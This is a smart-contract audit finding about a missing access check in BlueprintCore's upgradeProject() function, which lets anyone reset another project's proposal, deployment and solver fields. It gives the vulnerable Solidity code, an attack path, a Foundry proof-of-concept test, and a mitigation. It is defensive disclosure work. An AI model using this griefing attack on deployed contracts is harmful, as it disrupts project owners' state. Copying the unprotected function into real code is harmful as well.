Upbeat Tangerine Mule

Medium

# Unauthorized project upgrade vulnerability in `BlueprintCore::upgradeProject()` lead to anyone can call the function to reset project information

### Summary

A missing access control mechanism in the upgradeProject function will cause disruption of project states for project owners as anyone can call the function to reset project information.

### Root Cause

In the `upgradeProject` function, there is no access control to restrict who can call the function. This allows any user to reset the `requestProposalID`, `requestDeploymentID`, and `proposedSolverAddr` fields for any `projectId`.
https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L198-L203
```solidity
    function upgradeProject(bytes32 projectId) public hasProject(projectId) {
        // reset project info
        projects[projectId].requestProposalID = 0;
        projects[projectId].requestDeploymentID = 0;
        projects[projectId].proposedSolverAddr = dummyAddress;
    }
```

### Internal Pre-conditions

1. Project Owner needs to create a project using `createProjectID` or `setProjectId` to initialize a `projectId`.
2. Attacker needs to monitor the mempool or blockchain to identify active `projectIds`.

### External Pre-conditions

1. The contract must be deployed and operational on a blockchain.
2. The `projectId` must be publicly visible or guessable (e.g., through event logs or mempool monitoring).

### Attack Path

1. Attacker monitors the blockchain or mempool to identify active `projectIds`.
2. Attacker calls the `upgradeProject` function with a valid `projectId`.
3. The `upgradeProject` function resets the project's `requestProposalID`, `requestDeploymentID`, and `proposedSolverAddr` fields to default values.
4. The project owner loses access to their project's state, and any ongoing operations tied to the project are disrupted.

### Impact

Project owners suffer a loss of project state and functionality, which could lead to financial losses or operational disruptions.

Attackers gain the ability to grief project owners by resetting their project states, but they do not directly gain any financial benefit.

### PoC

```solidity
pragma solidity ^0.8.26;

import "forge-std/Test.sol";
import "../src/BlueprintCore.sol";

contract BlueprintCoreExploit is Test {
    BlueprintCore blueprintCore;
    address attacker = address(0x123);
    address projectOwner = address(0x456);
    bytes32 projectId;

    function setUp() public {
        blueprintCore = new BlueprintCore();
        projectId = blueprintCore.createProjectID();
    }

    function testExploit() public {
        // Attacker calls upgradeProject on a valid projectId
        vm.prank(attacker);
        blueprintCore.upgradeProject(projectId);

        // Verify that the project state has been reset
        (, bytes32 requestProposalID, bytes32[] memory requestDeploymentIDs) = blueprintCore.getProjectInfo(projectId);
        assertEq(requestProposalID, 0, "Request Proposal ID not reset");
        assertEq(requestDeploymentIDs.length, 0, "Request Deployment IDs not reset");
    }
}
```

### Mitigation

To mitigate this vulnerability, implement access control to restrict the `upgradeProject` function to authorized users (e.g., the project owner or contract owner).